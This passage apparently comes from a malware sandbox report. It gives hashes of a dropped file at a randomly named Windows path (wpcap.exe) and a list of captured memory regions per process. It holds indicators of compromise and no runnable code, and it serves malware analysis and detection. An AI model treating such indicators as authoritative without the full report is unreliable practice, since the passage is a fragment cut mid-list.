                                                                4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                SHA512

                                                                7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                              • C:\Windows\zthyliniv\eftbbbiir\wpcap.exe

                                                                Filesize

                                                                424KB

                                                                MD5

                                                                e9c001647c67e12666f27f9984778ad6

                                                                SHA1

                                                                51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                SHA256

                                                                7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                SHA512

                                                                56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

• memory/1040-224-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/1112-78-0x0000000000D90000-0x0000000000DDC000-memory.dmp
  Filesize: 304KB

• memory/1324-185-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/1328-180-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/1344-497-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-168-0x000002A92B1A0000-0x000002A92B1B0000-memory.dmp
  Filesize: 64KB

• memory/1344-182-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-499-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-199-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-165-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-212-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-496-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-247-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-218-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-234-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-754-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-178-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1344-756-0x00007FF713C80000-0x00007FF713DA0000-memory.dmp
  Filesize: 1.1MB

• memory/1676-231-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/1676-171-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/1944-142-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/1944-146-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/2028-197-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/2348-215-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/2588-175-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/3048-206-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/3140-236-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/3176-0-0x0000000000400000-0x0000000000A9B000-memory.dmp
  Filesize: 6.6MB

• memory/3176-4-0x0000000000400000-0x0000000000A9B000-memory.dmp
  Filesize: 6.6MB

• memory/3636-152-0x0000000010000000-0x0000000010008000-memory.dmp
  Filesize: 32KB

• memory/3636-162-0x0000000000400000-0x0000000000412000-memory.dmp
  Filesize: 72KB

• memory/3724-189-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/3972-246-0x00000000002C0000-0x00000000002D2000-memory.dmp
  Filesize: 72KB

• memory/4052-228-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/4060-138-0x00007FF6595C0000-0x00007FF6596AE000-memory.dmp
  Filesize: 952KB

• memory/4060-135-0x00007FF6595C0000-0x00007FF6596AE000-memory.dmp
  Filesize: 952KB

• memory/4292-220-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/4548-210-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/4880-202-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB

• memory/4900-8-0x0000000000400000-0x0000000000A9B000-memory.dmp
  Filesize: 6.6MB

• memory/5116-193-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp
  Filesize: 364KB